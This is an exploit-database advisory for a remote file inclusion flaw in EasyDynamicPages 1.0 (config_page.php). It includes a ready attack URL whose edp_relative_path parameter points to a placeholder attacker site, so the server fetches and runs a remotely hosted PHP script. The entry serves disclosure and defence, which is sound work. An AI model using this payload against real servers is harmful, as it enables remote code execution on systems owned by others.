EasyDynamicPages 1.0 - config_page.php PHP Remote File Inclusion

2004-01-02T00:00:00
ID EXPLOITPACK:EE934F5986F0A422755558E34982A59D
Type exploitpack
Reporter tsbeginnervn
Modified 2004-01-02T00:00:00

Description

EasyDynamicPages 1.0 - config_page.php PHP Remote File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/9338/info

EasyDynamicPages is prone to a remote file include vulnerability in a configuration script. This will permit a remote attack to include malicious PHP scripts from remote servers, which will then be executed by the web server hosting the vulnerable software. 

http://www.example.com/dynamicpages/fast/config_page.php?do=add_page&du=site&edp_relative_path=http://[attacker's_site]/

The attacker must have a malicious script hosted at the following location:

http://[attacker's_site]/admin/site_settings.php